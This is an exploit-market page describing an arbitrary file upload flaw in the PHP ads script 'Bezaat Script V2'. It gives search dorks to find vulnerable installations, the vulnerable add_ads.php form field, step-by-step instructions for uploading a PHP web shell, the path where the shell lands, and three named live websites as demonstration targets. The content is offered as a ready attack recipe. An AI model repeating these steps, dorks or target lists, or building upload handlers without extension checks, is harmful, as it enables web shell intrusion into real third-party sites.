[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Bezaat Script V2 Arbitrary Shell Upload Vulnerability

Author
xBADGIRL21
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-25239
Category
web applications
Date add
03-10-2016
Platform
php
######################
# Exploit Title : Bezaat Script V2 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork 1 : index of /SystemImages_ads/
# Dork 2 : Powed by Greenit Egypt for Information Technology
# Vendor Homepage : http://greenitegypt.net/products.php?cat_id=1
# Tested on: [ BACKBOX]
# MyBlog : http://xbadgirl21.blogspot.com/
# skype:xbadgirl21
# Date: 15/09/2016
# video Proof : https://youtu.be/AWqN2cng7u4
######################
# [★] DESCRIPTION :
######################
# [+] Bezaat Script It's An Commerce Script
# [+] That Allow you To Add and Menage ads in your Website
# [+] AND an Arbitrary Shell Upload has been Detected in his Script Version 2
# [+] The Other Version Maybe Also infected
######################
# [★] Poc :
######################
# When You want to Upload an Image For ads there is No Extention Check for the File Uploaded
# Referer: http://127.0.0.1//add_ads.php?cat_id=
# [add_ads.php] Vulnerable
# Content-Disposition: form-data; name="UploadlogoFile"; filename="shell.php"
# Content-Type: application/octetstream
######################
# [+] USAGE :
######################
# 1.- SELECT A WEBSITE FROM THE DORK ABOVE
# 2.- http://127.0.0.1/add_ads.html or http://127.0.0.1/add_ads.php
# 4.- fill the fields
# 5.- Upload your Shell like :shell.php to Upload Field
# 6.- Shell Directory : http://127.0.0.1/admin/SystemImages_ads/[NUM]_shell.php
# http://127.0.0.1/SystemImages_ads/[NUM]_shell.php
######################
# [★] Live Demo :
######################
# http://www.dalil1808080.com/add_ads.html
# http://www.al3ta.com/add_ads.php
# http://www.sooqalbalad.com/add_ads.html
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
######################

#  0day.today [2024-12-24]  #